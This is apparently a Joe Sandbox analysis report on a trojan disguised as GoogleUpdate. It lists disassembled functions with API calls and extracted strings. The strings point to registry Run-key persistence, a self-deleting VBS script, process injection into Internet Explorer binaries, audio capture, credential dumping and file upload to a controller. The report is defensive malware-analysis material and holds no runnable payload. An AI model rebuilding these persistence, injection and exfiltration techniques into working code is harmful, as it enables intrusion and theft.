Function 00410EDA Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
ExitProcess.KERNEL32(00000000), ref: 00410F05
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
CloseHandle.KERNEL32(00000000), ref: 00410FA0
GetCurrentProcessId.KERNEL32 ref: 00410FA6
PathFileExistsW.SHLWAPI(?), ref: 00410FD7
GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
lstrcatW.KERNEL32(?,.exe), ref: 00411066

Part of subcall function 0041A17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
Sleep.KERNEL32(000001F4), ref: 004110E7
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
CloseHandle.KERNEL32(00000000), ref: 0041110E
GetCurrentProcessId.KERNEL32 ref: 00411114

Strings

.exe, xrefs: 0041105A
exepath, xrefs: 00410F31
H"G, xrefs: 00410F0B
(#G, xrefs: 00410EE8
WDH, xrefs: 00410FAD, 0041111B
open, xrefs: 004110A0
temp_, xrefs: 00411048

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
API String ID: 2649220323-71629269
Opcode ID: eb248e324986b9b20c29ddac23cd87ea41ec1774206ead678826a737cf292c16
Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
Opcode Fuzzy Hash: eb248e324986b9b20c29ddac23cd87ea41ec1774206ead678826a737cf292c16
Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D

Function 0040BC59 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 259registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,0gj,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,0gj), ref: 0040BD63
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,0gj), ref: 0040BDA6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,0gj), ref: 0040BDB5

Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,0gj,0040BC76,?,00472200,pth_unenc,0gj), ref: 0040A801
Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(000404CB), ref: 0040A811
Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,0gj), ref: 0040A823

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,6C4E8300,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
ExitProcess.KERNEL32 ref: 0040BFD7

Strings

H"G, xrefs: 0040BD1C
fso.DeleteFolder ", xrefs: 0040BF48
Temp, xrefs: 0040BE04
open, xrefs: 0040BFCA
On Error Resume Next, xrefs: 0040BE52
fso.DeleteFile ", xrefs: 0040BED3
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BCA5
while fso.FileExists(", xrefs: 0040BE86
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BE43
.vbs, xrefs: 0040BDBF
wend, xrefs: 0040BF22
exepath, xrefs: 0040BD3F
"), xrefs: 0040BE6F
0gj, xrefs: 0040BC5F
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BF7F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BCF6
pth_unenc, xrefs: 0040BC60

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$0gj$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2736686755
Opcode ID: d44cd6c1543e68157222bd881e797b0f0dc11d1c81d48e1fe2873650623bca29
Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
Opcode Fuzzy Hash: d44cd6c1543e68157222bd881e797b0f0dc11d1c81d48e1fe2873650623bca29
Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E

Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7

Strings

RIFF, xrefs: 00401ADD
fmt , xrefs: 00401B0D
WAVE, xrefs: 00401AFD
data, xrefs: 00401B91

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3

Function 0044C60D Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044C69F
_free.LIBCMT ref: 0044C6C5
_free.LIBCMT ref: 0044C6EE
_free.LIBCMT ref: 0044C726
_free.LIBCMT ref: 0044C757
_free.LIBCMT ref: 0044C798
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044C819
_free.LIBCMT ref: 0044C832
_wcschr.LIBVCRUNTIME ref: 0044C86F
_free.LIBCMT ref: 0044C8DB
_free.LIBCMT ref: 0044C901
_free.LIBCMT ref: 0044C92A
_free.LIBCMT ref: 0044C95F
_free.LIBCMT ref: 0044C990
_free.LIBCMT ref: 0044C9D1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044CA56
_free.LIBCMT ref: 0044CA6F

Strings

0Zj, xrefs: 0044C67F, 0044C6D7, 0044C6E9, 0044C6F6, 0044C881, 0044C8A7, 0044C911, 0044C925, 0044C932, 0044C9F0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID: 0Zj
API String ID: 3899193279-907608346
Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D

Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044E4EA

Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7

_free.LIBCMT ref: 0044E4DF

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E501
_free.LIBCMT ref: 0044E516
_free.LIBCMT ref: 0044E521
_free.LIBCMT ref: 0044E543
_free.LIBCMT ref: 0044E556
_free.LIBCMT ref: 0044E564
_free.LIBCMT ref: 0044E56F
_free.LIBCMT ref: 0044E5A7
_free.LIBCMT ref: 0044E5AE
_free.LIBCMT ref: 0044E5CB
_free.LIBCMT ref: 0044E5E3

Strings

xF, xrefs: 0044E4BC

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: xF
API String ID: 161543041-2169143296
Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18

Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,6C4E8300,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
Sleep.KERNEL32(00000064), ref: 00411C63

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Strings

@#G, xrefs: 00411E45
@#G, xrefs: 00411D72
$.F, xrefs: 004119B6
/stext ", xrefs: 0041198C, 00411A2E, 00411ACD

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$$.F$@#G$@#G
API String ID: 1223786279-2596709126
Opcode ID: 495cc6ad49e5aae7b59b88f6a300b17bd28adf3321db0968c749ba4b08e7e4c6
Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
Opcode Fuzzy Hash: 495cc6ad49e5aae7b59b88f6a300b17bd28adf3321db0968c749ba4b08e7e4c6
Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A

Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D828
_free.LIBCMT ref: 0044D84C
_free.LIBCMT ref: 0044D859
_free.LIBCMT ref: 0044D87E
_free.LIBCMT ref: 0044D88B
_free.LIBCMT ref: 0044D894
_free.LIBCMT ref: 0044DB72
_free.LIBCMT ref: 0044DB7A

Strings

pF, xrefs: 0044D80E, 0044DAF7

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF
API String ID: 269201875-2973420481
Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754

Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133

Strings

C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E0A2
ieinstal.exe, xrefs: 0040E0B9
ielowutil.exe, xrefs: 0040E0FA
Attempt-S4A0CI, xrefs: 0040E02D
0gj, xrefs: 0040E061
Inj, xrefs: 0040E14F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: 0gj$Attempt-S4A0CI$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 193334293-205681062
Opcode ID: 6a58b71f373a24f92db658ce6798ec1ce32bab572a0f3f6893fd0dbd1fb820b1
Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
Opcode Fuzzy Hash: 6a58b71f373a24f92db658ce6798ec1ce32bab572a0f3f6893fd0dbd1fb820b1
Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A

Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
GetCursorPos.USER32(?), ref: 0041B39E
SetForegroundWindow.USER32(?), ref: 0041B3A7
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
ExitProcess.KERNEL32 ref: 0041B41A
CreatePopupMenu.USER32 ref: 0041B420
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435

Strings

Close, xrefs: 0041B426

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59

Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004432D8
_free.LIBCMT ref: 004432EE
_free.LIBCMT ref: 004432FF
_free.LIBCMT ref: 00443310
_free.LIBCMT ref: 00443327
GetCPInfo.KERNEL32(?,?), ref: 0044336F

Part of subcall function 00450054: _free.LIBCMT ref: 004500BF

_free.LIBCMT ref: 0044351B
_free.LIBCMT ref: 0044352E
_free.LIBCMT ref: 0044353C
_free.LIBCMT ref: 00443547
_free.LIBCMT ref: 00443589
_free.LIBCMT ref: 00443591
_free.LIBCMT ref: 00443599
_free.LIBCMT ref: 004435A1
_free.LIBCMT ref: 004435AF

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24

Function 004137DC Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
LoadLibraryA.KERNEL32(?), ref: 0041386D
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
FreeLibrary.KERNEL32(00000000), ref: 00413894
LoadLibraryA.KERNEL32(?), ref: 004138CC
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
FreeLibrary.KERNEL32(00000000), ref: 004138E5
GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
FreeLibrary.KERNEL32(00000000), ref: 0041390B

Strings

getaddrinfo, xrefs: 004137E9, 00413887, 004138D8
\ws2_32, xrefs: 00413855
\wship6, xrefs: 004138B4

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$getaddrinfo
API String ID: 2490988753-3078833738
Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE

Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
__aulldiv.LIBCMT ref: 00407D89

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
CloseHandle.KERNEL32(00000000), ref: 00407FA0
CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
CloseHandle.KERNEL32(00000000), ref: 00408038

Strings

Uploading file to Controller: , xrefs: 00407E11
ReadFile error, xrefs: 00408004
SetFilePointerEx error, xrefs: 00408010

Memory Dump Source

